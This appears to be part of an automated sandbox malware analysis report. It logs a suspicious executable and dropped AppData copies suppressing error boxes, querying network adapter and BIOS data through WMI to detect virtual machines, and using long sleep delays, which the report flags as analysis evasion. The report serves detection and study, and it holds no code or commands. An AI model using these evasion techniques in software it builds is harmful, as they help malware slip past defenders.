                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 4128Thread sleep time: -22136092888451448s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 3504Thread sleep count: 9714 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2460Thread sleep time: -13835058055282155s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5764Thread sleep count: 9473 > 30Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756Thread sleep time: -14757395258967632s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756Thread sleep time: -1200000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756Thread sleep time: -1199577s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756Thread sleep time: -1199436s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756Thread sleep time: -1199296s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756Thread sleep time: -1199155s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756Thread sleep time: -1199028s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756Thread sleep time: -1198890s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756Thread sleep time: -1198750s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756Thread sleep time: -1198624s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756Thread sleep time: -1198500s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756Thread sleep time: -1198305s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756Thread sleep time: -1198191s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756Thread sleep time: -1198046s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756Thread sleep time: -1197934s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756Thread sleep time: -1197796s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756Thread sleep time: -1197640s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756Thread sleep time: -1197531s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756Thread sleep time: -1197421s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756Thread sleep time: -1197296s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756Thread sleep time: -1197171s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756Thread sleep time: -1197027s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756Thread sleep time: -1196889s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756Thread sleep time: -1196774s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756Thread sleep time: -1196671s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756Thread sleep time: -1196548s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756Thread sleep time: -1196390s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756Thread sleep time: -1196281s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756Thread sleep time: -1196171s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756Thread sleep time: -1195937s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756Thread sleep time: -1195750s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756Thread sleep time: -1195636s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756Thread sleep time: -1195528s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756Thread sleep time: -1195421s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756Thread sleep time: -1195312s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756Thread sleep time: -1195202s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756Thread sleep time: -1195089s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756Thread sleep time: -1194968s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756Thread sleep time: -1194859s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756Thread sleep time: -1194749s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756Thread sleep time: -1194636s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756Thread sleep time: -1194530s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756Thread sleep time: -1194420s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756Thread sleep time: -1194312s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756Thread sleep time: -1194201s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756Thread sleep time: -1194093s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756Thread sleep time: -1193984s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756Thread sleep time: -1193869s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756Thread sleep time: -1193749s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756Thread sleep time: -1193640s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756Thread sleep time: -1193530s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe TID: 2164Thread sleep time: -15679732462653109s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe TID: 3276Thread sleep count: 9713 > 30Jump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 4324Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 4324Thread sleep count: 46 > 30Jump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 5792Thread sleep count: 9689 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1316Thread sleep time: -11068046444225724s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe TID: 2612Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe TID: 2612Thread sleep count: 46 > 30
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe TID: 2472Thread sleep count: 9680 > 30
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 1920Thread sleep time: -3689348814741908s >= -30000s
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 1920Thread sleep count: 42 > 30
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 2692Thread sleep count: 9658 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5668Thread sleep time: -20291418481080494s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe TID: 2748Thread sleep count: 525 > 30
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe TID: 2264Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe TID: 2264Thread sleep time: -1200000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe TID: 2264Thread sleep time: -1199711s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe TID: 2264Thread sleep time: -1198567s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe TID: 2264Thread sleep time: -1198396s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe TID: 2264Thread sleep time: -1198009s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe TID: 2264Thread sleep time: -1196965s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe TID: 2264Thread sleep time: -1196558s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1664Thread sleep time: -21213755684765971s >= -30000s
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1200000Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1199577Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1199436Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1199296Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1199155Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1199028Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1198890Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1198750Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1198624Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1198500Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1198305Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1198191Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1198046Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1197934Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1197796Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1197640Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1197531Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1197421Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1197296Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1197171Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1197027Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1196889Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1196774Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1196671Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1196548Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1196390Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1196281Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1196171Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1195937Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1195750Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1195636Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1195528Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1195421Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1195312Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1195202Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1195089Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1194968Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1194859Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1194749Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1194636Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1194530Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1194420Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1194312Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1194201Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1194093Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1193984Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1193869Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1193749Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1193640Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1193530Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeThread delayed: delay time: 1200000
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeThread delayed: delay time: 1199711
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeThread delayed: delay time: 1198567
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeThread delayed: delay time: 1198396
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeThread delayed: delay time: 1198009
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeThread delayed: delay time: 1196965
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeThread delayed: delay time: 1196558
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeWindow / User API: threadDelayed 9714Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9531Jump to behavior
